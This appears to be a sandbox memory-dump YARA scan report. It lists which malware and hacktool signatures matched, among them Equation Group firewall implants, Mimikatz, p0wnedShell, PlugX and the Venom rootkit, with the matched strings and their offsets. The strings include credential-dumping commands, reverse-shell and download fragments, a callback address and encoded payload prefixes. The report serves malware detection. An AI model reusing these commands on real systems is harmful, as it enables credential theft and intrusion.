00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Reflective_DLL_Loader_Aug17_3	Detects Reflective DLL Loader	Florian Roth	0x5ea2a:$s2: !!! Failed to gather information on system processes! 0x5e691:$s3: reflective_dll.dll 0x5ea7e:$s3: reflective_dll.dll 0x5eaf4:$s3: reflective_dll.dll 0x5eaae:$s4: [-] %s. Error=%d
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WoolenGoldfish_Sample_1	Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ	Florian Roth	0x17902b:$s1: Cannot execute (%d) 0x17905d:$s16: SvcName
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WoolenGoldfish_Generic_3	Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ	Florian Roth	0x1798f2:$x1: ... get header FATAL ERROR !!! %d bytes read > header_size 0x179984:$x3: connect_back_tcp_channel#do_connect:: Error resolving connect back hostname 0x183184:$x3: connect_back_tcp_channel#do_connect:: Error resolving connect back hostname 0x1799ed:$s0: kernel32.dll GetProcAddressLoadLibraryAws2_32.dll 0x179a87:$s2: Attempting to unlock uninitialized lock! 0x18313e:$s2: Attempting to unlock uninitialized lock! 0x179acd:$s4: unable to load kernel32.dll 0x179b36:$s6: %s len:%d 0x179b5e:$s7: Encountered error sending syscall response to client 0x18322b:$s7: Encountered error sending syscall response to client 0x179bb0:$s9: /info.dat 0x18302d:$s9: /info.dat 0x179bd8:$s10: Error entering thread lock 0x1832b1:$s10: Error entering thread lock 0x179c11:$s11: Error exiting thread lock 0x1832ea:$s11: Error exiting thread lock 0x179c49:$s12: connect_back_tcp_channel_init:: socket() failed 0x183322:$s12: connect_back_tcp_channel_init:: socket() failed
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	QuarksPwDump_Gen	Detects all QuarksPWDump versions	Florian Roth	0x105cf5:$s1: OpenProcessToken() error: 0x%08X 0x105d33:$s2: %d dumped 0x105d5a:$s3: AdjustTokenPrivileges() error: 0x%08X 0x105d9e:$s4: \SAM-%u.dmp
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_create_dns_injection	EQGRP Toolset Firewall - file create_dns_injection.py	Florian Roth	0xd95fa:$s1: Name: A hostname: 'host.network.com', a decimal numeric offset within 0xd965f:$s2: -a www.badguy.net,CNAME,1800,host.badguy.net \\
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_screamingplow	EQGRP Toolset Firewall - file screamingplow.sh	Florian Roth	0xd9866:$s1: What is the name of your PBD: 0xd98a1:$s2: You are now ready for a ScreamPlow
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_MixText	EQGRP Toolset Firewall - file MixText.py	Florian Roth	0xd9a8d:$s1: BinStore enabled implants.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_tunnel_state_reader	EQGRP Toolset Firewall - file tunnel_state_reader	Florian Roth	0xd9c86:$s1: Active connections will be maintained for this tunnel. Timeout: 0xd9ce3:$s5: %s: compatible with BLATSTING version 1.2
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_payload	EQGRP Toolset Firewall - file payload.py	Florian Roth	0xd9ed6:$s1: can't find target version module! 0xd9f15:$s2: class Payload:
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_eligiblecandidate	EQGRP Toolset Firewall - file eligiblecandidate.py	Florian Roth	0xdb879:$o1: Connection timed out. Only a problem if the callback was not received. 0xdb8dd:$o2: Could not reliably detect cookie. Using 'session_id'... 0xdb983:$c2: self.build_exploit_payload(cmd)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_BUSURPER_2211_724	EQGRP Toolset Firewall - file BUSURPER-2211-724.exe	Florian Roth	0xda104:$s1: .got_loader 0xdc459:$s1: .got_loader 0xdc9d3:$s1: .got_loader 0xddcb9:$s1: .got_loader 0xde331:$s1: .got_loader 0xde657:$s1: .got_loader 0xdf48b:$s1: .got_loader 0xe01a7:$s1: .got_loader 0xda12d:$s2: _start_text 0xdca49:$s2: _start_text 0xda156:$s3: IMPLANT 0xdaa93:$s3: IMPLANT 0xda17b:$s4: KEEPGOING 0xdaab8:$s4: KEEPGOING 0xdcaa0:$s4: KEEPGOING 0xde6a8:$s4: KEEPGOING 0xdf506:$s4: KEEPGOING 0xe0228:$s4: KEEPGOING 0xda1a2:$s5: upgrade_implant 0xdaadf:$s5: upgrade_implant
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_networkProfiler_orderScans	EQGRP Toolset Firewall - file networkProfiler_orderScans.sh	Florian Roth	0xda3a3:$x1: Unable to save off predefinedScans directory 0xda3ed:$x2: Re-orders the networkProfiler scans so they show up in order in the LP
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_epicbanana_2_1_0_1	EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py	Florian Roth	0xda613:$s1: failed to create version-specific payload
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_sniffer_xml2pcap	EQGRP Toolset Firewall - file sniffer_xml2pcap	Florian Roth	0xdbb88:$x1: -s/--srcip <sourceIP> Use given source IP (if sniffer doesn't collect source IP) 0xdbbf7:$x2: convert an XML file generated by the BLATSTING sniffer module into a pcap capture file.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_BananaAid	EQGRP Toolset Firewall - file BananaAid	Florian Roth	0xdbe26:$x1: (might have to delete key in ~/.ssh/known_hosts on linux box) 0xdbe81:$x2: scp BGLEE- 0xdbea0:$x3: should be 4bfe94b1 for clean bootloader version 3.0; 0xdbef3:$x4: scp <configured implant> <username>@<IPaddr>:onfig
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_config_jp1_UA	EQGRP Toolset Firewall - file config_jp1_UA.pl	Florian Roth	0xdc6b5:$x1: This program will configure a JETPLOW Userarea file. 0xdc707:$x2: Error running config_implant. 0xdc742:$x3: NOTE: IT ASSUMES YOU ARE OPERATING IN THE INSTALL/LP/JP DIRECTORY. THIS ASSUMPTION 0xdc7b4:$x4: First IP address for beacon destination [127.0.0.1]
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_userscript	EQGRP Toolset Firewall - file userscript.FW	Florian Roth	0xda860:$x1: Are you sure? Don't forget that NETSCREEN firewalls require BANANALIAR!!
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_BUSURPER_3001_724	EQGRP Toolset Firewall - file BUSURPER-3001-724.exe	Florian Roth	0xda156:$s1: IMPLANT 0xdaa93:$s1: IMPLANT 0xda17b:$s2: KEEPGOING 0xdaab8:$s2: KEEPGOING 0xdcaa0:$s2: KEEPGOING 0xde6a8:$s2: KEEPGOING 0xdf506:$s2: KEEPGOING 0xe0228:$s2: KEEPGOING 0xda1a2:$s3: upgrade_implant 0xdaadf:$s3: upgrade_implant
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_workit	EQGRP Toolset Firewall - file workit.py	Florian Roth	0xdccb4:$s1: macdef init > /tmp/.netrc; 0xdccec:$s2: /usr/bin/wget http:// 0xdcd1f:$s3: HOME=/tmp ftp 0xdcd4a:$s4: >> /tmp/.netrc; 0xdcd78:$s5: /usr/rapidstream/bin/tftp 0xdcdaf:$s6: created shell_command: 0xdcde3:$s7: rm -f /tmp/.netrc; 0xdce13:$s8: echo quit >> /tmp/.netrc; 0xdce4a:$s9: echo binary >> /tmp/.netrc; 0xdce84:$s10: chmod 600 /tmp/.netrc; 0xdceb9:$s11: created cli_command:
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_tinyhttp_setup	EQGRP Toolset Firewall - file tinyhttp_setup.sh	Florian Roth	0xdd0b0:$x1: firefox http://127.0.0.1:8000/$_name 0xdd0f2:$x2: What is the name of your implant: 0xdd131:$x3: killall thttpd 0xdd15d:$x4: copy http://<IP>:80/$_name flash:/$_name
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_EPBA	EQGRP Toolset Firewall - file EPBA.script	Florian Roth	0xdd7b4:$x1: ./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=NA -p 22 0xdd849:$x2: -t TARGET_IP, --target_ip=TARGET_IP -- Either 127.0.0.1 or Win Ops IP 0xdd8ac:$x3: ./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport RHP --dport RHP 0xdd911:$x4: --target_vers=TARGET_VERS target Pix version (pix712, asa804) (REQUIRED) 0xdd97a:$x5: -p DEST_PORT, --dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect port 0xdda02:$x6: this operation is complete, BananaGlee will 0xdda4b:$x7: cd /current/bin/FW/BGXXXX/Install/LP
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_jetplow_SH	EQGRP Toolset Firewall - file jetplow.sh	Florian Roth	0xddfcc:$s1: cd /current/bin/FW/BANANAGLEE/$bgver/Install/LP/jetplow 0xde021:$s2: *** Please place your UA in /current/bin/FW/OPS * 0xde076:$s3: ln -s ../jp/orig_code.bin orig_code_pixGen.bin 0xde0c2:$s4: * Welcome to JetPlow ***
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_extrabacon	EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py	Florian Roth	0xde8be:$x1: To disable password checking on target: 0xde903:$x2: [-] target is running 0xde936:$x3: [-] problem importing version-specific shellcode from 0xde989:$x4: [+] importing version-specific shellcode 0xde9cf:$s5: [-] unsupported target version, abort
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_sploit_py	EQGRP Toolset Firewall - file sploit.py	Florian Roth	0xdad00:$x1: the --spoof option requires 3 or 4 fields as follows redir_ip 0xdad52:$x2: [-] timeout waiting for response - target may have crashed 0xdadaa:$x3: [-] no response from health check - target may have crashed
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_uninstallPBD	EQGRP Toolset Firewall - file uninstallPBD.bat	Florian Roth	0xdafba:$s1: memset 00e9a05c 4 38845b88 0xdaff2:$s2: _hidecmd 0xdb018:$s3: memset 013abd04 1 0d
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_BICECREAM	EQGRP Toolset Firewall - file BICECREAM-2140	Florian Roth	0xdebcf:$s1: Could not connect to target device: %s:%d. Please check IP address. 0xdec30:$s2: command data size is invalid for an exec cmd 0xdec7a:$s3: A script was specified but target is not a PPC405-based NetScreen (NS5XT, NS25, and NS50). Executing scripts is supported but ma 0xded0f:$s4: Execute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n] 0xded65:$s5: Execute 0x%08x with args (%08x, %08x, %08x): [y/n] 0xdedb5:$s6: [%d] Execute code. 0xdede5:$s7: Execute 0x%08x with args (%08x): [y/n] 0xdee29:$s8: dump_value_LHASH_DOALL_ARG 0xdee61:$s9: Eggcode is complete. Pass execution to it? [y/n]
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_BFLEA_2201	EQGRP Toolset Firewall - file BFLEA-2201.exe	Florian Roth	0xda104:$s1: .got_loader 0xdc459:$s1: .got_loader 0xdc9d3:$s1: .got_loader 0xddcb9:$s1: .got_loader 0xde331:$s1: .got_loader 0xde657:$s1: .got_loader 0xdf48b:$s1: .got_loader 0xe01a7:$s1: .got_loader 0xdc9fc:$s2: LOADED 0xddd44:$s2: LOADED 0xde388:$s2: LOADED 0xdf4b4:$s2: LOADED 0xdf4d8:$s3: readFlashHandler 0xda17b:$s4: KEEPGOING 0xdaab8:$s4: KEEPGOING 0xdcaa0:$s4: KEEPGOING 0xde6a8:$s4: KEEPGOING 0xdf506:$s4: KEEPGOING 0xe0228:$s4: KEEPGOING 0xdf52d:$s5: flashRtnsPix6x.c 0xdf55b:$s6: fix_ip_cksum_incr
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_StoreFc	EQGRP Toolset Firewall - file StoreFc.py	Florian Roth	0xdfb30:$x1: Usage: StoreFc.py --configFile=<path to xml file> --implantFile=<path to BinStore implant> [--outputFile=<file to write the conf 0xdfc28:$x3: This is wrapper for Store.py that FELONYCROWBAR will use. This
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_BBALL	EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe	Florian Roth	0xe014b:$s1: Components/Modules/BiosModule/Implant/E28F6/../e28f640j3_asm.S 0xda104:$s2: .got_loader 0xdc459:$s2: .got_loader 0xdc9d3:$s2: .got_loader 0xddcb9:$s2: .got_loader 0xde331:$s2: .got_loader 0xde657:$s2: .got_loader 0xdf48b:$s2: .got_loader 0xe01a7:$s2: .got_loader 0xdca72:$s3: handler_readBIOS 0xe01d0:$s3: handler_readBIOS 0xe01fe:$s4: cmosReadByte 0xda17b:$s5: KEEPGOING 0xdaab8:$s5: KEEPGOING 0xdcaa0:$s5: KEEPGOING 0xde6a8:$s5: KEEPGOING 0xdf506:$s5: KEEPGOING 0xe0228:$s5: KEEPGOING 0xe024f:$s6: checksumAreaConfirmed.0 0xe0284:$s7: writeSpeedPlow.c
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_BARPUNCH_BPICKER	EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100	Florian Roth	0xe04df:$x1: --cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u 0xe0562:$x2: %s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options] 0xe05d8:$x3: * [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration) 0xe0652:$x4: %s version %s already has persistence installed. If you want to uninstall, 0xe06ba:$x5: The active module(s) on the target are not meant to be persisted
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_Implants_Gen5	EQGRP Toolset Firewall	Florian Roth	0xe0def:$x1: Module and Implant versions do not match. This module is not compatible with the target implant 0xe0e6d:$s1: %s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.log 0xe0eb8:$s2: %s/BF_%04d%02d%02d.log 0xe0eec:$s3: %s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.bin
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_pandarock	EQGRP Toolset Firewall - from files pandarock_v1.11.1.1.bin, pit	Florian Roth	0xe11dd:$x3: execute code in <file> passing <argX> (HEX) 0xe1226:$x4: * Use arrow keys to scroll through command history 0xe1276:$s1: pitCmd_processCmdLine 0xe12a9:$s2: execute all commands in <file> 0xe12e5:$s3: __processShellCmd 0xe1314:$s4: pitTarget_getDstPort 0xe1346:$s5: __processSetTargetIp 0xe1378:$o1: Logging commands and output - ON 0xe13b6:$o2: This command is too dangerous. If you'd like to run it, contact the development team
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_BananaUsurper_writeJetPlow	EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130	Florian Roth	0xe166d:$x1: Implant Version-Specific Values: 0xe16ab:$x2: This function should not be used with a Netscreen, something has gone horribly wrong 0xe171d:$s1: createSendRecv: recv'd an error from the target. 0xe176b:$s2: Error: WatchDogTimeout read returned %d instead of 4
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_Implants_Gen4	EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120	Florian Roth	0xe19f3:$s1: Command has not yet been coded 0xe1a2f:$s2: Beacon Domain : www.%s.com 0xe1a68:$s3: This command can only be run on a PIX/ASA 0xe1aaf:$s4: Warning! Bad or missing Flash values (in section 2 of .dat file) 0xe1b0d:$s5: Printing the interface info and security levels. PIX ONLY.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_Implants_Gen3	EQGRP Toolset Firewall	Florian Roth	0xe1db7:$x1: incomplete and must be removed manually.) 0xe1dfe:$s1: %s: recv'd an error from the target. 0xe1e40:$s2: Unable to fetch the address to the get_uptime_secs function for this OS version 0xe1ead:$s3: upload/activate/de-activate/remove/cmd function failed
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_BLIAR_BLIQUER	EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230	Florian Roth	0xe211a:$x1: Do you wish to activate the implant that is already on the firewall? (y/n): 0xe2184:$x2: There is no implant present on the firewall. 0xe21ce:$x3: Implant Version :%lx%lx%lx 0xe2206:$x4: You may now connect to the implant using the pbd idkey 0xe225a:$x5: No reply from persistant back door. 0xe229b:$x6: rm -rf pbd.wc; wc -c %s > pbd.wc 0xe22d9:$p1: PBD_GetVersion 0xe2305:$p2: pbd/pbdEncrypt.bin 0xe2335:$p3: pbd/pbdGetVersion.pkt 0xe2368:$p4: pbd/pbdStartWrite.bin 0xe239b:$p5: pbd/pbd_setNewHookPt.pkt 0xe23d1:$p6: pbd/pbd_Upload_SinglePkt.pkt 0xe240b:$s1: Unable to fetch hook and jmp addresses for this OS version 0xe2463:$s2: Could not get hook and jump addresses 0xe24a6:$s3: Enter the name of a clean implant binary (NOT an image): 0xe24fc:$s4: Unable to read dat file for OS version 0x%08lx 0xe2548:$s5: Invalid implant file
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_sploit	EQGRP Toolset Firewall - from files sploit.py, sploit.py	Florian Roth	0xe2907:$s4: exp.load_vinfo() 0xe2935:$s5: if not okay and self.terminateFlingOnException: 0xe29d9:$s7: if self.terminateFlingOnException: 0xe2a19:$s8: print 'Debug info ','='*40
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_Implants_Gen2	EQGRP Toolset Firewall	Florian Roth	0xe2cb9:$x1: Modules persistence file written successfully 0xe2d04:$x2: Modules persistence data successfully removed 0xe2d4f:$x3: No Modules are active on the firewall, nothing to persist 0xe04df:$s1: --cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s 0xe2da6:$s1: --cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s 0xe2e1b:$s2: Error while attemping to persist modules: 0xe2e62:$s3: Error while reading interface info from PIX 0xe2eab:$s4: LP.c:pixFree - Failed to get response 0xe2eee:$s5: WARNING: LP Timeout specified (%lu seconds) less than default (%u seconds). Setting default 0xe2f68:$s6: Unable to fetch config address for this OS version 0xe2fb8:$s7: LP.c: interface information not available for this session 0xe3010:$s8: [%s:%s:%d] ERROR: 0xe3040:$s9: extract_fgbg
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_Implants_Gen1	EQGRP Toolset Firewall	Florian Roth	0xe32eb:$s1: WARNING: Session may not have been closed! 0xe3334:$s2: EXEC Packet Processed 0xe3367:$s3: Failed to insert the command into command list. 0xe33b4:$s4: Send_Packet: Trying to send too much data. 0xe33fc:$s5: payloadLength >= MAX_ALLOW_SIZE. 0xe343a:$s6: Wrong Payload Size 0xe346a:$s7: Unknown packet received...... 0xe34a5:$s8: Returned eax = %08x
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_ssh_telnet_29	EQGRP Toolset Firewall - from files ssh.py, telnet.py	Florian Roth	0xe39f0:$s1: received prompt, we're in 0xe3a27:$s2: failed to login, bad creds, abort 0xe3ad3:$s4: received nat - EPBA: ok, payload: mangled, did not run 0xe3b27:$s5: no status returned from target, could be an exploit failure, or this is a version where we don't expect a stus return 0xe3bb1:$s6: received arp - EPBA: ok, payload: fail
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_callbacks	EQGRP Toolset Firewall - Callback addresses	Florian Roth	0xdb457:$s1: 30.40.50.60:9342
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_Extrabacon_Output	EQGRP Toolset Firewall - Extrabacon exploit output	Florian Roth	0xe3e27:$s1: \|###[ SNMPresponse ]### 0xe3e5c:$s2: [+] generating exploit for exec mode pass-disable 0xe3eab:$s3: [+] building payload for mode pass-disable 0xe3ef3:$s4: [+] Executing: extrabacon 0xe3f2b:$s5: appended AAAADMINAUTH_ENABLE payload
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EQGRP_Unique_Strings	EQGRP Toolset Firewall - Unique strings	Florian Roth	0xdb63c:$s1: /BananaGlee/ELIGIBLEBOMB 0xdb669:$s2: Protocol must be either http or https (Ex: https://1.2.3.4:1234)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	kerberoast_PY	Auto-generated rule - file kerberoast.py	Florian Roth	0xf037e:$s1: newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce) 0xf03f1:$s2: key = kerberos.ntlmhash(args.password) 0xf0435:$s3: help='the password used to decrypt/encrypt the ticket') 0xf048a:$s4: newencserverticket = kerberos.encrypt(key, 2, e, nonce)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	p0wnedPowerCat	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPowerCat.cs	Florian Roth	0xb9e05:$x1: Now if we point Firefox to http://127.0.0.1 0xb9e4e:$x2: powercat -l -v -p 0xb9e7d:$x3: P0wnedListener 0xba56f:$x3: P0wnedListener 0xb9ea9:$x4: EncodedPayload.bat 0xb9ed9:$x5: powercat -c 0xb9f03:$x6: Program.P0wnedPath() 0xbb73d:$x6: Program.P0wnedPath() 0xb9f2c:$x7: Invoke-PowerShellTcpOneLine
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0xba1ae:$x1: Invoke-TokenManipulation 0xbab46:$x1: Invoke-TokenManipulation 0xba1e4:$x2: windows/meterpreter 0xbac36:$x2: windows/meterpreter 0x10bac3:$x2: windows/meterpreter 0xba215:$x3: lsadump::dcsync 0xba242:$x4: p0wnedShellx86 0xba26e:$x5: p0wnedShellx64 0xba8d8:$x5: p0wnedShellx64 0xba951:$x5: p0wnedShellx64 0xba29a:$x6: Invoke_PsExec() 0xba2c7:$x7: Invoke-Mimikatz 0xd4c3c:$x7: Invoke-Mimikatz 0xd4ee3:$x7: Invoke-Mimikatz 0xd5a53:$x7: Invoke-Mimikatz 0xf74b7:$x7: Invoke-Mimikatz 0x10bd1d:$x7: Invoke-Mimikatz 0x10c98c:$x7: Invoke-Mimikatz 0xba2f4:$x8: Invoke_Shellcode() 0xba324:$x9: Invoke-ReflectivePEInjection 0xca5c2:$x9: Invoke-ReflectivePEInjection
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	p0wnedPotato	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPotato.cs	Florian Roth	0xba545:$x1: Invoke-Tater 0xba56f:$x2: P0wnedListener.Execute(WPAD_Proxy); 0xba5b0:$x3: -SpooferIP 0xba5d1:$x4: TaterCommand()
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	p0wnedExploits	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedExploits.cs	Florian Roth	0xba82a:$x1: Pshell.RunPSCommand(Whoami); 0xba864:$x2: If succeeded this exploit should popup a System CMD Shell
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	p0wnedBinaries	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedBinaries.cs	Florian Roth	0xbaab2:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9 0xbb214:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9 0xbb296:$x2: wpoWAB+LCAAAAAAABADs/QeyK7uOBYhORUNIenL+E2vBA0ympH3erY4f8Tte3TpbUiY9YRbcGK91vVKtr+tV3v/B/yr/m1vD/+DvNOVb+V/f 0xbb317:$x3: mo0MAB+LCAAAAAAABADsXQl24zqu3YqXII6i9r+xJ4AACU4SZcuJnVenf/9OxbHEAcRwcQGu62NbHsrax/Iw+3/hP5b+VzuH/4WfVeDf8n98 0xbb398:$x4: LE4CAB+LCAAAAAAABADsfQmW2zqu6Fa8BM7D/jf2hRmkKNuVm/Tt9zunkipb4giCIGb2/prhFUt5hVe+/sNP4b+pVvwPn+OQp/LT9ge/+ 0xbb416:$x5: XpMCAB+LCAAAAAAABADsfQeWIzmO6FV0hKAn73+xL3iAwVAqq2t35r/tl53VyhCDFoQ3Y7zW9Uq1vq5Xef/CT+X/59bwFz6nKU/lp+8P/ 0xbb494:$x6: STwAAB+LCAAAAAAABADtWwmy6yoO3YqXgJjZ/8ZaRwNgx/HNfX/o7qqUkxgzCM0SmLR2jHBQzkc4En9xZbvHUuSLMnWv9ateK/70ilStR 0xbb512:$x7: namespace p0wnedShell 0xbb76f:$x7: namespace p0wnedShell
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	p0wnedAmsiBypass	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedAmsiBypass.cs	Florian Roth	0xb9f03:$x1: Program.P0wnedPath() 0xbb73d:$x1: Program.P0wnedPath() 0xbb512:$x2: namespace p0wnedShell 0xbb76f:$x2: namespace p0wnedShell 0xbb7a2:$x3: H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMVryzxIbGrt/rcFRZIa1CQYEFCQnxotUhP2pX3Q337HpYotCKrPdbmoQQnkOY0+BQCNKRpe
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	p0wnedShell_outputs	p0wnedShell Runspace Post Exploitation Toolkit - from files p0wnedShell.cs, p0wnedShell.cs	Florian Roth	0xbba28:$s1: [+] For this attack to succeed, you need to have Admin privileges. 0xbba88:$s2: [+] This is not a valid hostname, please try again 0xbbad8:$s3: [+] First return the name of our current domain.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PlugX_J16_Gen2	Detects PlugX Malware Samples from June 2016	Florian Roth	0xec666:$s1: XPlugKeyLogger.cpp 0xec696:$s2: XPlugProcess.cpp 0xec6c4:$s4: XPlgLoader.cpp 0xec6f0:$s5: XPlugPortMap.cpp 0xec71e:$s8: XPlugShell.cpp 0xec74b:$s11: file: %s, line: %d, error: [%d]%s 0xec78b:$s12: XInstall.cpp 0xec7b6:$s13: XPlugTelnet.cpp 0xec7e4:$s14: XInstallUAC.cpp
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Venom_Rootkit	Venom Linux Rootkit	Florian Roth	0xc1d7e:$s1: %%VENOM%CTRL%MODE%% 0xc1daf:$s2: %%VENOM%OK%OK%% 0xc1ddc:$s3: %%VENOM%WIN%WN%% 0xc1e0a:$s4: %%VENOM%AUTHENTICATE%% 0xc1e3e:$s5: . entering interactive shell 0xc1e78:$s6: . processing ltun request 0xc1eaf:$s7: . processing rtun request 0xc1ee6:$s8: . processing get request 0xc1f1c:$s9: . processing put request 0xc1f53:$s10: venom by mouzone 0xc1f82:$s11: justCANTbeSTOPPED
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ps1_toolkit_Invoke_Shellcode	Auto-generated rule - file Invoke-Shellcode.ps1	Florian Roth	0xd49ce:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory 0xd4db6:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory 0x10ac6a:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory 0xd4a1b:$s2: Get-ProcAddress kernel32.dll OpenProcess 0xd4afa:$s4: inject shellcode into 0xd4b24:$s5: Injecting shellcode 0x10bb24:$s5: Injecting shellcode
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ps1_toolkit_Invoke_Mimikatz	Auto-generated rule - file Invoke-Mimikatz.ps1	Florian Roth	0xd49ce:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory 0xd4db6:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory 0x10ac6a:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory 0xd4e03:$s2: ps \| where { $_.Name -eq $ProcName } \| select ProcessName, Id, SessionId 0xd4e69:$s3: privilege::debug exit 0xd4e93:$s4: Get-ProcAddress Advapi32.dll AdjustTokenPrivileges 0xd5417:$s4: Get-ProcAddress Advapi32.dll AdjustTokenPrivileges 0xd4ee3:$s5: Invoke-Mimikatz -DumpCreds 0xd4f1b:$s6: \| Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ps1_toolkit_Invoke_RelfectivePEInjection	Auto-generated rule - file Invoke-RelfectivePEInjection.ps1	Florian Roth	0xd51ee:$x1: Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) 0xd527d:$x2: Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local 0xd52fc:$x3: } = Get-ProcAddress Advapi32.dll OpenThreadToken 0xd5341:$x4: Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local 0xd53b8:$s5: $PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll') 0xd5415:$s6: = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
